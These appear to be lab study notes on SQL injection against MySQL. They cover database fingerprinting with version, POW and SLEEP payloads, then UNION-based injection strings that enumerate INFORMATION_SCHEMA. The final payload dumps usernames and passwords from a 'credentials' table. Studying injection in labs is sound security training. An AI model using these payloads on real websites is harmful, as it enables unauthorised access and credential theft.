MySQL Fingerprinting
If the web server is using Apache or Nginx, it is a good guess that the web server is using something like MySQL.
If the web server is using IIS, DBMS could be MSSQL.
Let’s try fingerprinting MySQL database:
| Payload | When to Use | Expected Output | Wrong Output |
|---|---|---|---|
SELECT @@version | When we have full query output | MySQL Version ‘i.e. 10.3.22-MariaDB-1ubuntu1’ | In MSSQL it returns MSSQL version. Error with other DBMS. |
SELECT POW(1,1) | When we only have numeric output | 1 | Error with other DBMS |
SELECT SLEEP(5) | Blind/No Output | Delays page response for 5 seconds and returns 0. | Will not delay response with other DBMS |
Information_schema Database
INFORMATION_SCHEMA database contains metadata about the databases and tables present on the server.
To reference a table present in another DB, we can use . operator.
e.g SELECT a table users present in a database named my_database.
SELECT * FROM my_database.users;SCHEMATA
SCHEMATA table in the INFORMATION_SCHEMA database contains information about all databases on the server.
mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
+--------------------+
| SCHEMA_NAME |
+--------------------+
| mysql |
| information_schema |
| performance_schema |
| ilfreight |
| dev |
+--------------------+
6 rows in set (0.01 sec)To find out about the current database:
cn' UNION select 1,database(),2,3-- -Tables
Before we dump data from database, we need to get a list of the tables to query them with a SELECT statement.
TABLE_SCHEMA- points to the database each column belongs toTABLE_NAME- stores table names
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -Columns
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -Data
cn' UNION select 1, username, password, 4 from dev.credentials-- -